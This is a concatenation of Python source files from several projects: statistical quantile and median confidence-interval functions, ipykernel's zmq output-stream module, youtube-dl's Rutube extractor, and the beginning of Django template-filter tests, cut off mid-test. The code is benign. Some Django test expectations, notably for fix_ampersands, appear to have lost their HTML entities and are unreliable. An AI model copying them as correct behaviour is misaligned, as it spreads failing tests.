        Sequence of quantiles whose standard error is estimated.
    axis : int or None, optional
        Axis along which to work. If None, use a flattened array.
    """
    def _mjci_1d(row, quantiles):
        # Work on the sorted, unmasked values only.
        values = np.sort(row.compressed())
        size = values.size
        # Rank of the order statistic closest to each requested quantile.
        ranks = (np.array(quantiles) * size + 0.5).astype(np.int_)
        betacdf = beta.cdf
        out = np.empty(len(ranks), np.float64)
        upper = np.arange(1, size + 1, dtype=np.float64) / size
        lower = upper - 1. / size
        for idx, rank in enumerate(ranks):
            # Beta-CDF increments give the Maritz-Jarrett weights.
            weights = (betacdf(upper, rank - 1, size - rank)
                       - betacdf(lower, rank - 1, size - rank))
            first = np.dot(weights, values)
            second = np.dot(weights, values**2)
            # Standard error = sqrt of the weighted variance.
            out[idx] = np.sqrt(second - first**2)
        return out
    data = ma.array(data, copy=False)
    if data.ndim > 2:
        raise ValueError("Array 'data' must be at most two dimensional, "
                         "but got data.ndim = %d" % data.ndim)
    p = np.array(prob, copy=False, ndmin=1)
    # Computes quantiles along axis (or globally)
    if axis is None:
        return _mjci_1d(data, p)
    return ma.apply_along_axis(_mjci_1d, axis, data, p)
def mquantiles_cimj(data, prob=[0.25,0.50,0.75], alpha=0.05, axis=None):
    """Alpha-level confidence intervals for selected quantiles of the data,
    using Maritz-Jarrett standard-error estimators.

    Parameters
    ----------
    data : ndarray
        Data array.
    prob : sequence, optional
        Sequence of quantiles to compute.
    alpha : float, optional
        Confidence level of the intervals.
    axis : int or None, optional
        Axis along which to compute the quantiles.
        If None, use a flattened array.
    """
    alpha = min(alpha, 1 - alpha)
    # Normal critical value for the two-sided interval.
    zscore = norm.ppf(1 - alpha / 2.)
    quantiles = mstats.mquantiles(data, prob, alphap=0, betap=0, axis=axis)
    halfwidth = zscore * mjci(data, prob, axis=axis)
    return (quantiles - halfwidth, quantiles + halfwidth)
def median_cihs(data, alpha=0.05, axis=None):
    """
    Computes the alpha-level confidence interval for the median of the data.

    Uses the Hettmasperger-Sheather method.

    Parameters
    ----------
    data : array_like
        Input data. Masked values are discarded. The input should be 1D only,
        or `axis` should be set to None.
    alpha : float, optional
        Confidence level of the intervals.
    axis : int or None, optional
        Axis along which to compute the quantiles. If None, use a flattened
        array.

    Returns
    -------
    median_cihs
        Alpha level confidence interval.
    """
    def _cihs_1D(data, alpha):
        # Order statistics of the unmasked values.
        data = np.sort(data.compressed())
        n = len(data)
        alpha = min(alpha, 1-alpha)
        # k: index of the order statistic bounding the interval.
        k = int(binom._ppf(alpha/2., n, 0.5))
        # Coverage of the interval [x_(k), x_(n-k)] under Binomial(n, 1/2).
        gk = binom.cdf(n-k,n,0.5) - binom.cdf(k-1,n,0.5)
        if gk < 1-alpha:
            # Widen by one order statistic if coverage is insufficient.
            k -= 1
            gk = binom.cdf(n-k,n,0.5) - binom.cdf(k-1,n,0.5)
        gkk = binom.cdf(n-k-1,n,0.5) - binom.cdf(k,n,0.5)
        # Interpolation between adjacent order statistics.
        I = (gk - 1 + alpha)/(gk - gkk)
        lambd = (n-k) * I / float(k + (n-2*k)*I)
        lims = (lambd*data[k] + (1-lambd)*data[k-1],
                lambd*data[n-k-1] + (1-lambd)*data[n-k])
        return lims
    # BUG FIX: was ``ma.rray`` (AttributeError on numpy.ma); also the
    # axis-None branch passed ``data.compressed()`` (a plain ndarray) into
    # _cihs_1D, which calls ``.compressed()`` again and would fail.  Pass the
    # masked array itself; the helper does the compression.
    data = ma.array(data, copy=False)
    # Computes quantiles along axis (or globally)
    if (axis is None):
        result = _cihs_1D(data, alpha)
    else:
        if data.ndim > 2:
            raise ValueError("Array 'data' must be at most two dimensional, "
                             "but got data.ndim = %d" % data.ndim)
        result = ma.apply_along_axis(_cihs_1D, axis, data, alpha)
    return result
def compare_medians_ms(group_1, group_2, axis=None):
    """Compare the medians of two independent samples.

    The absolute difference of the medians is scaled by the McKean-Schrader
    estimate of the standard error of the medians, and the resulting
    statistic is referred to the standard normal distribution.

    Parameters
    ----------
    group_1 : array_like
        First dataset.
    group_2 : array_like
        Second dataset.
    axis : int, optional
        Axis along which the medians are estimated. If None, the arrays are
        flattened. If `axis` is not None, then `group_1` and `group_2`
        should have the same shape.

    Returns
    -------
    compare_medians_ms : {float, ndarray}
        If `axis` is None, a float; otherwise a 1-D ndarray of floats with
        length equal to the length of `group_1` along `axis`.
    """
    median_1 = ma.median(group_1, axis=axis)
    median_2 = ma.median(group_2, axis=axis)
    stde_1 = mstats.stde_median(group_1, axis=axis)
    stde_2 = mstats.stde_median(group_2, axis=axis)
    # Normalized absolute difference of the medians.
    W = np.abs(median_1 - median_2) / ma.sqrt(stde_1**2 + stde_2**2)
    return 1 - norm.cdf(W)
def idealfourths(data, axis=None):
    """Estimate the lower and upper quartiles with the ideal-fourths
    algorithm.

    Parameters
    ----------
    data : array_like
        Input array.
    axis : int, optional
        Axis along which the quartiles are estimated. If None, the arrays
        are flattened.

    Returns
    -------
    idealfourths : {list of floats, masked array}
        The two internal values that divide `data` into four parts, either
        along the flattened array (if `axis` is None) or along `axis`.
    """
    def _quartiles_1d(row):
        values = row.compressed()
        count = len(values)
        if count < 3:
            # Not enough data for the interpolation.
            return [np.nan, np.nan]
        # Ideal-fourths position: split n/4 + 5/12 into integer and
        # fractional parts, then interpolate between order statistics.
        pos, frac = divmod(count / 4. + 5. / 12., 1)
        pos = int(pos)
        lower = (1 - frac) * values[pos - 1] + frac * values[pos]
        mirror = count - pos
        upper = (1 - frac) * values[mirror] + frac * values[mirror - 1]
        return [lower, upper]
    ordered = ma.sort(data, axis=axis).view(MaskedArray)
    if axis is None:
        return _quartiles_1d(ordered)
    return ma.apply_along_axis(_quartiles_1d, axis, ordered)
def rsh(data, points=None):
    """Evaluate Rosenblatt's shifted-histogram density estimator at each
    point.

    Parameters
    ----------
    data : sequence
        Input data. Masked values are ignored.
    points : sequence or None, optional
        Positions where the estimator is evaluated; defaults to `data`.
    """
    data = ma.array(data, copy=False)
    if points is None:
        points = data
    else:
        points = np.array(points, copy=False, ndmin=1)
    if data.ndim != 1:
        raise AttributeError("The input array should be 1D only !")
    nobs = data.count()
    # Bandwidth from the interquartile range: 1.2 * IQR / n^(1/5).
    quartiles = idealfourths(data, axis=None)
    halfwidth = 1.2 * (quartiles[-1] - quartiles[0]) / nobs**(1./5)
    # Count, for every evaluation point, the observations inside the
    # shifted window [point - h, point + h].
    above = (data[:,None] <= points[None,:] + halfwidth).sum(0)
    below = (data[:,None] < points[None,:] - halfwidth).sum(0)
    return (above - below) / (2.*nobs*halfwidth)
| bsd-3-clause |
kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/ipykernel/iostream.py | 5 | 13790 | # coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
import os
import sys
import threading
import warnings
from io import StringIO, UnsupportedOperation
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
    """An object for sending IOPub messages in a background thread

    Prevents a blocking main thread from delaying output from threads.

    IOPubThread(pub_socket).background_socket is a Socket-API-providing object
    whose IO is always run in a thread.
    """

    def __init__(self, socket, pipe=False):
        """Create IOPub thread

        Parameters
        ----------
        socket: zmq.PUB Socket
            the socket on which messages will be sent.
        pipe: bool
            Whether this process should listen for IOPub messages
            piped from subprocesses.
        """
        self.socket = socket
        self.background_socket = BackgroundSocket(self)
        # PID of the creating process; used later to detect forks.
        self._master_pid = os.getpid()
        self._pipe_flag = pipe
        # Private IOLoop, run by self.thread (never by the main thread).
        self.io_loop = IOLoop()
        if pipe:
            self._setup_pipe_in()
        # Thread-local storage: zmq sockets are not thread-safe, so each
        # thread lazily gets its own PUSH pipe (see _event_pipe).
        self._local = threading.local()
        # Pending callbacks keyed by random event id (see schedule()).
        self._events = {}
        self._setup_event_pipe()
        self.thread = threading.Thread(target=self._thread_main)
        self.thread.daemon = True

    def _thread_main(self):
        """The inner loop that's actually run in a thread"""
        # start() blocks until stop() is scheduled from another thread.
        self.io_loop.start()
        self.io_loop.close()
        if hasattr(self._local, 'event_pipe'):
            self._local.event_pipe.close()

    def _setup_event_pipe(self):
        """Create the PULL socket listening for events that should fire in this thread."""
        ctx = self.socket.context
        pipe_in = ctx.socket(zmq.PULL)
        pipe_in.linger = 0
        # Random inproc endpoint so multiple instances never collide.
        _uuid = b2a_hex(os.urandom(16)).decode('ascii')
        iface = self._event_interface = 'inproc://%s' % _uuid
        pipe_in.bind(iface)
        self._event_puller = ZMQStream(pipe_in, self.io_loop)
        self._event_puller.on_recv(self._handle_event)

    @property
    def _event_pipe(self):
        """thread-local event pipe for signaling events that should be processed in the thread"""
        try:
            event_pipe = self._local.event_pipe
        except AttributeError:
            # new thread, new event pipe
            ctx = self.socket.context
            event_pipe = ctx.socket(zmq.PUSH)
            event_pipe.linger = 0
            event_pipe.connect(self._event_interface)
            self._local.event_pipe = event_pipe
        return event_pipe

    def _handle_event(self, msg):
        """Handle an event on the event pipe"""
        # The single frame carries the event id; pop and fire its callback.
        event_id = msg[0]
        event_f = self._events.pop(event_id)
        event_f()

    def _setup_pipe_in(self):
        """setup listening pipe for IOPub from forked subprocesses"""
        ctx = self.socket.context
        # use UUID to authenticate pipe messages
        self._pipe_uuid = os.urandom(16)
        pipe_in = ctx.socket(zmq.PULL)
        pipe_in.linger = 0
        try:
            self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
        except zmq.ZMQError as e:
            warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
                          "\nsubprocess output will be unavailable."
                          )
            # Disable the subprocess pipe entirely rather than failing.
            self._pipe_flag = False
            pipe_in.close()
            return
        self._pipe_in = ZMQStream(pipe_in, self.io_loop)
        self._pipe_in.on_recv(self._handle_pipe_msg)

    def _handle_pipe_msg(self, msg):
        """handle a pipe message from a subprocess"""
        if not self._pipe_flag or not self._is_master_process():
            return
        # First frame must carry the shared secret set in _setup_pipe_in.
        if msg[0] != self._pipe_uuid:
            print("Bad pipe message: %s", msg, file=sys.__stderr__)
            return
        self.send_multipart(msg[1:])

    def _setup_pipe_out(self):
        # must be new context after fork
        ctx = zmq.Context()
        pipe_out = ctx.socket(zmq.PUSH)
        pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
        pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
        return ctx, pipe_out

    def _is_master_process(self):
        # True in the process that created this thread, False after a fork.
        return os.getpid() == self._master_pid

    def _check_mp_mode(self):
        """check for forks, and switch to zmq pipeline if necessary"""
        if not self._pipe_flag or self._is_master_process():
            return MASTER
        else:
            return CHILD

    def start(self):
        """Start the IOPub thread"""
        self.thread.start()
        # make sure we don't prevent process exit
        # I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
        atexit.register(self.stop)

    def stop(self):
        """Stop the IOPub thread"""
        if not self.thread.is_alive():
            return
        # Ask the loop to stop from inside its own thread, then wait.
        self.io_loop.add_callback(self.io_loop.stop)
        self.thread.join()

    def close(self):
        self.socket.close()
        self.socket = None

    @property
    def closed(self):
        return self.socket is None

    def schedule(self, f):
        """Schedule a function to be called in our IO thread.

        If the thread is not running, call immediately.
        """
        if self.thread.is_alive():
            # Register the callback under a fresh random id, then wake the
            # IO thread by pushing the id through the event pipe.
            event_id = os.urandom(16)
            while event_id in self._events:
                event_id = os.urandom(16)
            self._events[event_id] = f
            self._event_pipe.send(event_id)
        else:
            f()

    def send_multipart(self, *args, **kwargs):
        """send_multipart schedules actual zmq send in my thread.

        If my thread isn't running (e.g. forked process), send immediately.
        """
        self.schedule(lambda : self._really_send(*args, **kwargs))

    def _really_send(self, msg, *args, **kwargs):
        """The callback that actually sends messages"""
        mp_mode = self._check_mp_mode()
        if mp_mode != CHILD:
            # we are master, do a regular send
            self.socket.send_multipart(msg, *args, **kwargs)
        else:
            # we are a child, pipe to master
            # new context/socket for every pipe-out
            # since forks don't teardown politely, use ctx.term to ensure send has completed
            ctx, pipe_out = self._setup_pipe_out()
            pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
            pipe_out.close()
            ctx.term()
class BackgroundSocket(object):
    """Wrapper around IOPub thread that provides zmq send[_multipart]

    Attribute access other than ``io_thread`` is forwarded (with a
    DeprecationWarning) to the real zmq socket owned by the IOPub thread, so
    legacy code that treats this object as a plain socket keeps working.
    """
    io_thread = None

    def __init__(self, io_thread):
        self.io_thread = io_thread

    def __getattr__(self, attr):
        """Wrap socket attr access for backward-compatibility"""
        if attr.startswith('__') and attr.endswith('__'):
            # don't wrap magic methods.  BUG FIX: this used to call
            # super().__getattr__, which does not exist on object and raised
            # a confusing AttributeError; raise a clean one instead.
            raise AttributeError(attr)
        if hasattr(self.io_thread.socket, attr):
            warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
                          DeprecationWarning, stacklevel=2)
            return getattr(self.io_thread.socket, attr)
        raise AttributeError(attr)

    def __setattr__(self, attr, value):
        # BUG FIX: was ``attr.startswith('__' and attr.endswith('__'))`` --
        # the misplaced parenthesis passed a bool to str.startswith, raising
        # TypeError on any non-dunder attribute assignment.
        if attr == 'io_thread' or (attr.startswith('__') and attr.endswith('__')):
            super(BackgroundSocket, self).__setattr__(attr, value)
        else:
            warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
                          DeprecationWarning, stacklevel=2)
            setattr(self.io_thread.socket, attr, value)

    def send(self, msg, *args, **kwargs):
        # Single-frame send is just a one-element multipart send.
        return self.send_multipart([msg], *args, **kwargs)

    def send_multipart(self, *args, **kwargs):
        """Schedule send in IO thread"""
        return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(object):
    """A file like object that publishes the stream to a 0MQ PUB socket.

    Output is handed off to an IO Thread
    """

    # The time interval between automatic flushes, in seconds.
    flush_interval = 0.2
    topic=None

    def __init__(self, session, pub_thread, name, pipe=None):
        if pipe is not None:
            warnings.warn("pipe argument to OutStream is deprecated and ignored",
                          DeprecationWarning)
        self.encoding = 'UTF-8'
        # This is necessary for compatibility with Python built-in streams
        self.errors = None
        self.session = session
        if not isinstance(pub_thread, IOPubThread):
            # Backward-compat: given socket, not thread. Wrap in a thread.
            warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
                          DeprecationWarning, stacklevel=2)
            pub_thread = IOPubThread(pub_thread)
            pub_thread.start()
        self.pub_thread = pub_thread
        self.name = name
        # IOPub topic for this stream, e.g. b'stream.stdout'.
        self.topic = b'stream.' + py3compat.cast_bytes(name)
        self.parent_header = {}
        # PID of the creating process; used to detect forked children.
        self._master_pid = os.getpid()
        self._flush_pending = False
        self._io_loop = pub_thread.io_loop
        self._new_buffer()

    def _is_master_process(self):
        # False after a fork, in the child process.
        return os.getpid() == self._master_pid

    def set_parent(self, parent):
        # Remember the parent header so output is routed to the right cell.
        self.parent_header = extract_header(parent)

    def close(self):
        self.pub_thread = None

    @property
    def closed(self):
        return self.pub_thread is None

    def _schedule_flush(self):
        """schedule a flush in the IO thread

        call this on write, to indicate that flush should be called soon.
        """
        if self._flush_pending:
            return
        self._flush_pending = True
        # add_timeout has to be handed to the io thread via event pipe
        def _schedule_in_thread():
            self._io_loop.call_later(self.flush_interval, self._flush)
        self.pub_thread.schedule(_schedule_in_thread)

    def flush(self):
        """trigger actual zmq send

        send will happen in the background thread
        """
        if self.pub_thread.thread.is_alive():
            # wait for flush to actually get through:
            self.pub_thread.schedule(self._flush)
            # The Event is set after _flush has run in the IO thread,
            # because scheduled callbacks execute in order.
            evt = threading.Event()
            self.pub_thread.schedule(evt.set)
            evt.wait()
        else:
            self._flush()

    def _flush(self):
        """This is where the actual send happens.

        _flush should generally be called in the IO thread,
        unless the thread has been destroyed (e.g. forked subprocess).
        """
        self._flush_pending = False
        data = self._flush_buffer()
        if data:
            # FIXME: this disables Session's fork-safe check,
            # since pub_thread is itself fork-safe.
            # There should be a better way to do this.
            self.session.pid = os.getpid()
            content = {u'name':self.name, u'text':data}
            self.session.send(self.pub_thread, u'stream', content=content,
                              parent=self.parent_header, ident=self.topic)

    def isatty(self):
        return False

    def __next__(self):
        raise IOError('Read not supported on a write only stream.')

    # Python 2 uses .next() for the iterator protocol; alias it.
    if not py3compat.PY3:
        next = __next__

    def read(self, size=-1):
        raise IOError('Read not supported on a write only stream.')

    def readline(self, size=-1):
        raise IOError('Read not supported on a write only stream.')

    def fileno(self):
        raise UnsupportedOperation("IOStream has no fileno.")

    def write(self, string):
        if self.pub_thread is None:
            raise ValueError('I/O operation on closed file')
        else:
            # Make sure that we're handling unicode
            if not isinstance(string, unicode_type):
                string = string.decode(self.encoding, 'replace')
            is_child = (not self._is_master_process())
            # only touch the buffer in the IO thread to avoid races
            self.pub_thread.schedule(lambda : self._buffer.write(string))
            if is_child:
                # newlines imply flush in subprocesses
                # mp.Pool cannot be trusted to flush promptly (or ever),
                # and this helps.
                if '\n' in string:
                    self.flush()
            else:
                self._schedule_flush()

    def writelines(self, sequence):
        if self.pub_thread is None:
            raise ValueError('I/O operation on closed file')
        else:
            for string in sequence:
                self.write(string)

    def _flush_buffer(self):
        """clear the current buffer and return the current buffer data.

        This should only be called in the IO thread.
        """
        data = u''
        if self._buffer is not None:
            # Swap in a fresh buffer before reading the old one.
            buf = self._buffer
            self._new_buffer()
            data = buf.getvalue()
            buf.close()
        return data

    def _new_buffer(self):
        self._buffer = StringIO()
| gpl-3.0 |
coreynicholson/youtube-dl | youtube_dl/extractor/rutube.py | 24 | 6818 | # coding: utf-8
from __future__ import unicode_literals
import re
import itertools
from .common import InfoExtractor
from ..compat import (
compat_str,
)
from ..utils import (
determine_ext,
unified_strdate,
)
class RutubeIE(InfoExtractor):
    """Extractor for single Rutube videos (watch pages and embeds)."""
    IE_NAME = 'rutube'
    IE_DESC = 'Rutube videos'
    # The video id is a 32-character lowercase hex hash.
    _VALID_URL = r'https?://rutube\.ru/(?:video|(?:play/)?embed)/(?P<id>[\da-z]{32})'

    _TESTS = [{
        'url': 'http://rutube.ru/video/3eac3b4561676c17df9132a9a1e62e3e/',
        'info_dict': {
            'id': '3eac3b4561676c17df9132a9a1e62e3e',
            'ext': 'mp4',
            'title': 'Раненный кенгуру забежал в аптеку',
            'description': 'http://www.ntdtv.ru ',
            'duration': 80,
            'uploader': 'NTDRussian',
            'uploader_id': '29790',
            'upload_date': '20131016',
            'age_limit': 0,
        },
        'params': {
            # It requires ffmpeg (m3u8 download)
            'skip_download': True,
        },
    }, {
        'url': 'http://rutube.ru/play/embed/a10e53b86e8f349080f718582ce4c661',
        'only_matching': True,
    }, {
        'url': 'http://rutube.ru/embed/a10e53b86e8f349080f718582ce4c661',
        'only_matching': True,
    }]

    @staticmethod
    def _extract_urls(webpage):
        # Collect Rutube embed iframes found in an arbitrary HTML page.
        return [mobj.group('url') for mobj in re.finditer(
            r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//rutube\.ru/embed/[\da-z]{32}.*?)\1',
            webpage)]

    def _real_extract(self, url):
        video_id = self._match_id(url)
        # Metadata endpoint: title, description, author, timestamps, etc.
        video = self._download_json(
            'http://rutube.ru/api/video/%s/?format=json' % video_id,
            video_id, 'Downloading video JSON')
        # Some videos don't have the author field
        author = video.get('author') or {}
        # Playback endpoint: maps format ids to stream URLs.
        options = self._download_json(
            'http://rutube.ru/api/play/options/%s/?format=json' % video_id,
            video_id, 'Downloading options JSON')
        formats = []
        for format_id, format_url in options['video_balancer'].items():
            # Dispatch on container type; m3u8/f4m expand to several formats.
            ext = determine_ext(format_url)
            if ext == 'm3u8':
                formats.extend(self._extract_m3u8_formats(
                    format_url, video_id, 'mp4', m3u8_id=format_id, fatal=False))
            elif ext == 'f4m':
                formats.extend(self._extract_f4m_formats(
                    format_url, video_id, f4m_id=format_id, fatal=False))
            else:
                # Plain progressive download URL.
                formats.append({
                    'url': format_url,
                    'format_id': format_id,
                })
        self._sort_formats(formats)
        return {
            'id': video['id'],
            'title': video['title'],
            'description': video['description'],
            'duration': video['duration'],
            'view_count': video['hits'],
            'formats': formats,
            'thumbnail': video['thumbnail_url'],
            'uploader': author.get('name'),
            'uploader_id': compat_str(author['id']) if author else None,
            'upload_date': unified_strdate(video['created_ts']),
            'age_limit': 18 if video['is_adult'] else 0,
        }
class RutubeEmbedIE(InfoExtractor):
    """Extractor for numeric-id embed URLs; resolves them to watch pages."""
    IE_NAME = 'rutube:embed'
    IE_DESC = 'Rutube embedded videos'
    # Note: unlike RutubeIE, the embed id here is numeric, not a hex hash.
    _VALID_URL = r'https?://rutube\.ru/(?:video|play)/embed/(?P<id>[0-9]+)'

    _TESTS = [{
        'url': 'http://rutube.ru/video/embed/6722881?vk_puid37=&vk_puid38=',
        'info_dict': {
            'id': 'a10e53b86e8f349080f718582ce4c661',
            'ext': 'mp4',
            'upload_date': '20131223',
            'uploader_id': '297833',
            'description': 'Видео группы ★http://vk.com/foxkidsreset★ музей Fox Kids и Jetix<br/><br/> восстановлено и сделано в шикоформате subziro89 http://vk.com/subziro89',
            'uploader': 'subziro89 ILya',
            'title': 'Мистический городок Эйри в Индиан 5 серия озвучка subziro89',
        },
        'params': {
            'skip_download': 'Requires ffmpeg',
        },
    }, {
        'url': 'http://rutube.ru/play/embed/8083783',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        embed_id = self._match_id(url)
        webpage = self._download_webpage(url, embed_id)
        # The canonical link points at the regular watch page, which is then
        # handled by RutubeIE.
        canonical_url = self._html_search_regex(
            r'<link\s+rel="canonical"\s+href="([^"]+?)"', webpage,
            'Canonical URL')
        return self.url_result(canonical_url, 'Rutube')
class RutubeChannelIE(InfoExtractor):
    """Extractor for Rutube channel (tag) playlists.

    Also the base class for the movie and person extractors below, which
    reuse the paginated _extract_videos helper with their own page template.
    """
    IE_NAME = 'rutube:channel'
    IE_DESC = 'Rutube channels'
    _VALID_URL = r'https?://rutube\.ru/tags/video/(?P<id>\d+)'

    _TESTS = [{
        'url': 'http://rutube.ru/tags/video/1800/',
        'info_dict': {
            'id': '1800',
        },
        'playlist_mincount': 68,
    }]

    # Filled in with (channel_id, page_number).
    _PAGE_TEMPLATE = 'http://rutube.ru/api/tags/video/%s/?page=%s&format=json'

    def _extract_videos(self, channel_id, channel_title=None):
        # Walk the paginated API until it reports no next page (or an
        # empty result list) and hand each entry back to RutubeIE.
        entries = []
        for pagenum in itertools.count(1):
            page = self._download_json(
                self._PAGE_TEMPLATE % (channel_id, pagenum),
                channel_id, 'Downloading page %s' % pagenum)
            results = page['results']
            if not results:
                break
            entries.extend(self.url_result(result['video_url'], 'Rutube') for result in results)
            if not page['has_next']:
                break
        return self.playlist_result(entries, channel_id, channel_title)

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        channel_id = mobj.group('id')
        return self._extract_videos(channel_id)
class RutubeMovieIE(RutubeChannelIE):
    """Extractor for Rutube movie playlists (metainfo/tv pages)."""
    IE_NAME = 'rutube:movie'
    IE_DESC = 'Rutube movies'
    _VALID_URL = r'https?://rutube\.ru/metainfo/tv/(?P<id>\d+)'
    _TESTS = []

    # Endpoint for the movie's own metadata (used for the playlist title).
    _MOVIE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/?format=json'
    # Overrides the channel page template with the movie video listing.
    _PAGE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/video?page=%s&format=json'

    def _real_extract(self, url):
        movie_id = self._match_id(url)
        movie = self._download_json(
            self._MOVIE_TEMPLATE % movie_id, movie_id,
            'Downloading movie JSON')
        movie_name = movie['name']
        # Pagination itself is inherited from RutubeChannelIE.
        return self._extract_videos(movie_id, movie_name)
class RutubePersonIE(RutubeChannelIE):
    """Extractor for a person's uploaded-videos playlist.

    Only the URL pattern and the page template differ from the channel
    extractor; extraction logic is fully inherited.
    """
    IE_NAME = 'rutube:person'
    IE_DESC = 'Rutube person videos'
    _VALID_URL = r'https?://rutube\.ru/video/person/(?P<id>\d+)'

    _TESTS = [{
        'url': 'http://rutube.ru/video/person/313878/',
        'info_dict': {
            'id': '313878',
        },
        'playlist_mincount': 37,
    }]

    _PAGE_TEMPLATE = 'http://rutube.ru/api/video/person/%s/?page=%s&format=json'
| unlicense |
bufferapp/buffer-django-nonrel | tests/regressiontests/defaultfilters/tests.py | 49 | 24500 | # -*- coding: utf-8 -*-
import datetime
from django.utils import unittest
from django.template.defaultfilters import *
class DefaultFiltersTests(unittest.TestCase):
    """Unit tests for Django's built-in template filters, which are pulled
    into this namespace by ``from django.template.defaultfilters import *``.
    Each test method exercises one filter (or a small family) with literal
    inputs and exact expected outputs.
    NOTE(review): some expected strings below (e.g. in test_fix_ampersands
    and test_force_escape) look as if HTML entities such as ``&amp;`` and
    ``&lt;`` were unescaped when this file was copied -- verify against
    upstream Django before trusting those expectations.
    """
    def test_floatformat(self):
        # Default behaviour: one decimal place, trailing ".0" dropped.
        self.assertEqual(floatformat(7.7), u'7.7')
        self.assertEqual(floatformat(7.0), u'7')
        self.assertEqual(floatformat(0.7), u'0.7')
        self.assertEqual(floatformat(0.07), u'0.1')
        self.assertEqual(floatformat(0.007), u'0.0')
        self.assertEqual(floatformat(0.0), u'0')
        # Positive precision always pads; negative precision only keeps
        # decimals when they are non-zero.
        self.assertEqual(floatformat(7.7, 3), u'7.700')
        self.assertEqual(floatformat(6.000000, 3), u'6.000')
        self.assertEqual(floatformat(6.200000, 3), u'6.200')
        self.assertEqual(floatformat(6.200000, -3), u'6.200')
        self.assertEqual(floatformat(13.1031, -3), u'13.103')
        self.assertEqual(floatformat(11.1197, -2), u'11.12')
        self.assertEqual(floatformat(11.0000, -2), u'11')
        self.assertEqual(floatformat(11.000001, -2), u'11.00')
        self.assertEqual(floatformat(8.2798, 3), u'8.280')
        # Non-numeric values and invalid precision arguments degrade
        # gracefully instead of raising.
        self.assertEqual(floatformat(u'foo'), u'')
        self.assertEqual(floatformat(13.1031, u'bar'), u'13.1031')
        self.assertEqual(floatformat(18.125, 2), u'18.13')
        self.assertEqual(floatformat(u'foo', u'bar'), u'')
        self.assertEqual(floatformat(u'¿Cómo esta usted?'), u'')
        self.assertEqual(floatformat(None), u'')
        # Check that we're not converting to scientific notation.
        self.assertEqual(floatformat(0, 6), u'0.000000')
        self.assertEqual(floatformat(0, 7), u'0.0000000')
        self.assertEqual(floatformat(0, 10), u'0.0000000000')
        self.assertEqual(floatformat(0.000000000000000000015, 20),
                                     u'0.00000000000000000002')
        # Infinities and NaN are formatted the same way unicode() shows them.
        pos_inf = float(1e30000)
        self.assertEqual(floatformat(pos_inf), unicode(pos_inf))
        neg_inf = float(-1e30000)
        self.assertEqual(floatformat(neg_inf), unicode(neg_inf))
        nan = pos_inf / pos_inf
        self.assertEqual(floatformat(nan), unicode(nan))
        # Objects that only define __float__ should still be accepted.
        class FloatWrapper(object):
            def __init__(self, value):
                self.value = value
            def __float__(self):
                return self.value
        self.assertEqual(floatformat(FloatWrapper(11.000001), -2), u'11.00')
    # This fails because of Python's float handling. Floats with many zeroes
    # after the decimal point should be passed in as another type such as
    # unicode or Decimal.
    @unittest.expectedFailure
    def test_floatformat_fail(self):
        self.assertEqual(floatformat(1.00000000000000015, 16), u'1.0000000000000002')
    def test_addslashes(self):
        self.assertEqual(addslashes(u'"double quotes" and \'single quotes\''),
                          u'\\"double quotes\\" and \\\'single quotes\\\'')
        self.assertEqual(addslashes(ur'\ : backslashes, too'),
                          u'\\\\ : backslashes, too')
    def test_capfirst(self):
        self.assertEqual(capfirst(u'hello world'), u'Hello world')
    def test_escapejs(self):
        # escapejs emits \uXXXX escapes so output is safe inside JS strings.
        self.assertEqual(escapejs(u'"double quotes" and \'single quotes\''),
            u'\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027')
        self.assertEqual(escapejs(ur'\ : backslashes, too'),
            u'\\u005C : backslashes, too')
        self.assertEqual(escapejs(u'and lots of whitespace: \r\n\t\v\f\b'),
            u'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008')
        self.assertEqual(escapejs(ur'<script>and this</script>'),
            u'\\u003Cscript\\u003Eand this\\u003C/script\\u003E')
        self.assertEqual(
            escapejs(u'paragraph separator:\u2029and line separator:\u2028'),
            u'paragraph separator:\\u2029and line separator:\\u2028')
    def test_fix_ampersands(self):
        # NOTE(review): expected value looks unescaped (should presumably
        # contain &amp;) -- likely mangled in transit; confirm upstream.
        self.assertEqual(fix_ampersands(u'Jack & Jill & Jeroboam'),
                          u'Jack & Jill & Jeroboam')
    def test_linenumbers(self):
        # Line numbers are zero-padded to the width of the largest number.
        self.assertEqual(linenumbers(u'line 1\nline 2'),
                          u'1. line 1\n2. line 2')
        self.assertEqual(linenumbers(u'\n'.join([u'x'] * 10)),
                          u'01. x\n02. x\n03. x\n04. x\n05. x\n06. x\n07. '\
                          u'x\n08. x\n09. x\n10. x')
    def test_lower(self):
        self.assertEqual(lower('TEST'), u'test')
        # uppercase E umlaut
        self.assertEqual(lower(u'\xcb'), u'\xeb')
    def test_make_list(self):
        self.assertEqual(make_list('abc'), [u'a', u'b', u'c'])
        self.assertEqual(make_list(1234), [u'1', u'2', u'3', u'4'])
    def test_slugify(self):
        self.assertEqual(slugify(' Jack & Jill like numbers 1,2,3 and 4 and'\
            ' silly characters ?%.$!/'),
            u'jack-jill-like-numbers-123-and-4-and-silly-characters')
        # Accented characters are transliterated to ASCII.
